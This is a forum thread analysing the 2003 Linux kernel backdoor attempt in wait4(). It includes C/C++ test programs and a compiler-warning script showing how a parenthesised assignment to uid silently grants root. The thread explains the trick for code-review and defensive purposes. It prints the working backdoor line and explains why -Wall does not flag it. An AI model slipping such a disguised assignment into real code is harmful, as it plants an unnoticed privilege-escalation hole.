(old) Linux backdoor attempt with a coding trick

This (old) article describes a backdoor (attempt) in the Linux kernel and I have just seen a reference to it: The Linux Backdoor Attempt of 2003 - Freedom to Tinker

The core of it is this piece of code:

// ********
  if ((options == (__WCLONE | __WALL)) && (current->uid = 0))
    retval = -EINVAL;
// ********

which looks innocent enough but there is a trick in it which, if you can't spot it, is described in the linked article. I thought that a modern compiler would give a warning in one of the critical areas, so I tried it on https://cpp.sh/ with C++20 and -Wall, -Wextra and -Wpedantic. It gave no warning.

Here is a test bed to try it for those interested:

#include <iostream>
#include <cerrno>

int main()
{
  // Stand-ins for the kernel names, chosen so the quoted line compiles unchanged.
  bool options = true;
  bool __WCLONE = true;
  bool __WALL = false;
  int retval = 0;
  struct Current {
    int uid = 42;
  } currentD;
  Current * current = &currentD;

// ********
  if ((options == (__WCLONE | __WALL)) && (current->uid = 0))
    retval = -EINVAL;
// ********

  // Prints 0 and then 0: the "error" branch never runs (the assignment
  // evaluates to 0), but uid has been overwritten with 0 as a side effect.
  std::cout << retval << "\n";
  std::cout << current->uid << "\n";
}

I had expected at least a warning about an assignment in an if condition.
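To make the effect of the quoted line concrete, here is an added example (not code from the original post or from the kernel) that puts the 2003 line next to the check it resembles and runs both on behalf of a constructed unprivileged caller. `struct task`, the `wait4_check_*` wrappers and the caller with uid 1000 are assumptions standing in for the kernel's `current` task struct; the flag values are the ones from Linux's include/uapi/linux/wait.h.

```c
/*
 * Added example, not code from the original post or from the kernel: the
 * 2003 wait4() line beside the check it was pretending to be, wrapped in
 * small functions so the effect on the caller's uid can be observed.
 * `struct task` and the caller below are assumptions standing in for the
 * kernel's `current` task struct.
 */
#include <stdio.h>
#include <errno.h>

/* Flag values as defined in Linux's include/uapi/linux/wait.h. */
#ifndef __WALL
#define __WALL   0x40000000
#endif
#ifndef __WCLONE
#define __WCLONE 0x80000000
#endif

/* Assumed stand-in for the kernel task struct: only the field that matters. */
struct task {
    unsigned int uid;
};

/*
 * The line as quoted in the post above. The inner expression is an
 * assignment: `current->uid = 0` is executed and evaluates to 0, so the if
 * body never runs. No error is returned, but the calling task now has uid 0.
 * The otherwise meaningless flag combination is the trigger.
 */
int wait4_check_backdoored(unsigned int options, struct task *current)
{
    int retval = 0;
    if ((options == (__WCLONE | __WALL)) && (current->uid = 0))
        retval = -EINVAL;
    return retval;
}

/* What a reader skims it as: reject the flag combination when the caller is root. */
int wait4_check_intended(unsigned int options, struct task *current)
{
    int retval = 0;
    if ((options == (__WCLONE | __WALL)) && (current->uid == 0))
        retval = -EINVAL;
    return retval;
}

/*
 * Run one check for a constructed unprivileged caller (uid 1000) and report
 * whether it walked away with uid 0 and no error: 1 = yes, 0 = no.
 */
int unprivileged_caller_becomes_root(int (*check)(unsigned int, struct task *),
                                     unsigned int options)
{
    struct task t = { .uid = 1000 };
    int retval = check(options, &t);
    return retval == 0 && t.uid == 0;
}

/* Sanity check on the intended version: a root caller with the flags gets -EINVAL. */
int intended_rejects_root_caller(void)
{
    struct task t = { .uid = 0 };
    return wait4_check_intended(__WCLONE | __WALL, &t) == -EINVAL && t.uid == 0;
}

int main(void)
{
    printf("backdoored, trigger flags:  root=%d\n",
           unprivileged_caller_becomes_root(wait4_check_backdoored, __WCLONE | __WALL));
    printf("backdoored, ordinary flags: root=%d\n",
           unprivileged_caller_becomes_root(wait4_check_backdoored, __WALL));
    printf("intended,   trigger flags:  root=%d\n",
           unprivileged_caller_becomes_root(wait4_check_intended, __WCLONE | __WALL));
    printf("intended rejects root caller: %d\n", intended_rejects_root_caller());
    return 0;
}
```

The backdoored check compiles cleanly with `-Wall` because the assignment sits inside its own parentheses; the only observable difference from the intended version is that an unprivileged caller passing exactly `__WCLONE | __WALL` comes back with uid 0 and no error, while any other flag value leaves it untouched.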

Interesting; the funny (?) thing is that if (current_id = 0) does result in a warning but the combination of two conditions does not.

It's not the combination, but the () around the assignment.
In fact, the compiler tells us to add them to avoid warnings if this is actually what we intended:

 warning: suggest parentheses around assignment used as truth value [-Wparentheses]
    4 |   if (x = y) return 1;
      |       ~~^~~
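The point in the reply above, that the outer parentheses are what silence -Wparentheses, can be checked directly. The script below is an added example, not part of the thread: it compiles three variants of the condition with -Wall and reports whether the compiler complained about an assignment used as a condition. It assumes a C compiler reachable as $CC or as cc on the PATH (it prints "skip" if there is none); the warns_on helper and the one-line function it compiles are constructed here.

```shell
#!/bin/sh
# Added example, not from the original thread: compile three one-line
# conditions with -Wall and report whether the compiler complained about an
# assignment used as a condition. Assumes a C compiler is reachable as $CC
# or `cc`; prints "skip" if none is found.

CC="${CC:-cc}"

# warns_on CONDITION
#   Prints "warn" if -Wall diagnosed an assignment inside `if (CONDITION)`,
#   "quiet" if it compiled silently, "error" if it did not compile at all,
#   or "skip" when no compiler is available.
warns_on() {
    command -v "$CC" >/dev/null 2>&1 || { echo skip; return 0; }
    dir=$(mktemp -d) || return 1
    # The condition is spliced into a minimal function body (constructed source).
    printf 'int f(int x, int y) { if (%s) return 1; return 0; }\n' "$1" >"$dir/t.c"
    if ! "$CC" -Wall -c -o "$dir/t.o" "$dir/t.c" 2>"$dir/err"; then
        result=error
    elif grep -qi 'assignment' "$dir/err"; then
        # gcc: "suggest parentheses around assignment used as truth value"
        # clang: "using the result of an assignment as a condition without parentheses"
        result=warn
    else
        result=quiet
    fi
    rm -rf "$dir"
    echo "$result"
}

echo "if (x = y)               -> $(warns_on 'x = y')"
echo "if ((x = y))             -> $(warns_on '(x = y)')"
echo "if ((x == 1) && (y = 0)) -> $(warns_on '(x == 1) && (y = 0)')"
```

With gcc or clang the first variant warns and the other two compile silently. The extra parentheses are the documented way of telling the compiler that an assignment in a condition is intentional, so the kernel line has exactly the shape the warning is designed to accept; catching it needs a reviewer, or a lint rule that flags every assignment inside an if condition whether parenthesised or not.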
